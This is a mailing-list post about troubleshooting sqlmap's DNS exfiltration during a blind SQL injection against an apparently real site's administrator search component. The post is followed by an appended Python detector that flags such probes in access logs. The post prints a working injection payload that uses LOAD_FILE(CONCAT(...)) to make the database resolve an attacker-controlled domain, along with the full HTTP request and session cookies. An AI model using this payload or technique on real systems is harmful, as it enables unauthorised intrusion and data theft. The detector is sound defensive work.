Hey all, I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit and am trying to get dns exfil to work, but am not having any luck.
I start sqlmap as root with the --dns-domain option set to a domain that I control and have the sqlmap machine set as the authoritative NS for. Running with a -v6, this is the info I get:

===============================================
[18:22:18] [INFO] testing for data retrieval through DNS channel
[18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
[18:22:18] [TRAFFIC OUT] HTTP request [#3]:
GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-control: no-cache,no-store
Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
Connection: close

[18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
Content-length: 8627
Content-encoding: gzip
Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Vary: Accept-Encoding
Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
Server: Apache
Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
Connection: close
Pragma: no-cache
Cache-control: post-check=0, pre-check=0
Date: Wed, 22 Jan 2014 23:22:20 GMT
P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-type: text/html; charset=utf-8

[18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
[18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
===============================================

If I run a tcpdump on the sqlmap machine, I see DNS requests come in for "target.net", and if I do manual DNS queries to the domain I own, sqlmap responds as expected with localhost.domain.com. Any idea? Am I doing anything wrong?

Chris

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
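As an added example (not from Chris's post and not sqlmap's own code), here is a small Python detector that a defender could run over web access logs to spot the DNS-channel probe shown in the -v6 output above. It URL-decodes the query string, looks for LOAD_FILE(CONCAT(...)) built from hex literals, decodes those literals, and reports the UNC prefix and the domain the database server would be made to resolve. The request in the sample log line is the one from the post; the client address, timestamp and response size are constructed, and the "last two labels are the registrable domain" rule is a simplifying assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log line. The request is the one from the sqlmap -v6
# output above; the client address, timestamp and response size are made up.
SAMPLE_LOG = (
    '203.0.113.7 - - [22/Jan/2014:23:22:19 +0000] "GET /administrator/index.php?option=com_mcsearch'
    '&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%28'
    '0x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29'
    '%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29'
    '%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1" 200 8627'
)

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
LOAD_FILE_CONCAT = re.compile(r"LOAD_FILE\s*\(\s*CONCAT\s*\(", re.IGNORECASE)


def decode_hex_literals(sql):
    """Return every 0x... literal in the statement decoded as text.

    MySQL treats a hex literal as a raw byte string, so decoding it shows exactly
    what CONCAT() will build, with no string-escaping rules in the way.
    """
    out = []
    for m in HEX_LITERAL.finditer(sql):
        digits = m.group(1)
        if len(digits) % 2:
            continue  # odd-length literal is not a byte string; skip it
        out.append(bytes.fromhex(digits).decode("latin-1"))
    return out


def extract_request_params(log_line):
    """Pull the URL-decoded query-string values out of a combined-format log line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    return [v for values in parse_qs(query, keep_blank_values=True).values() for v in values]


def find_dns_exfil(log_line):
    """Flag a request whose injected SQL builds a UNC path inside LOAD_FILE(CONCAT(...)).

    Returns None when nothing suspicious is present, otherwise a dict describing
    the attacker-controlled name the database server would try to resolve.
    """
    for value in extract_request_params(log_line):
        if not LOAD_FILE_CONCAT.search(value):
            continue
        parts = decode_hex_literals(value)
        # The probe wraps its data in a prefix that starts with backslashes (a UNC
        # path) and a suffix that carries the exfiltration domain.
        unc_parts = [p for p in parts if p.startswith("\\\\")]
        if not unc_parts:
            continue
        prefix = unc_parts[0]
        suffix = next((p for p in parts if p.startswith(".") and "." in p[1:]), "")
        host_tail = suffix.split("\\")[0]  # drop the share name after the host part
        labels = [label for label in host_tail.split(".") if label]
        # Assumption: the registrable domain is the last two labels. Good enough for
        # second-level domains; a public-suffix list would be needed in general.
        domain = ".".join(labels[-2:]) if len(labels) >= 2 else host_tail
        return {
            "unc_prefix": prefix,
            "dns_suffix": host_tail,
            "exfil_domain": domain,
            "decoded_literals": parts,
        }
    return None


if __name__ == "__main__":
    print(find_dns_exfil(SAMPLE_LOG))
```

Run on the sample line, the detector reports the UNC prefix `\\\\Mwj.` and the suffix `.yVN.securefile.net`, so an alert can name the domain the database host was asked to look up; correlating that with outbound DNS queries from the database server for the same name confirms whether the probe actually fired.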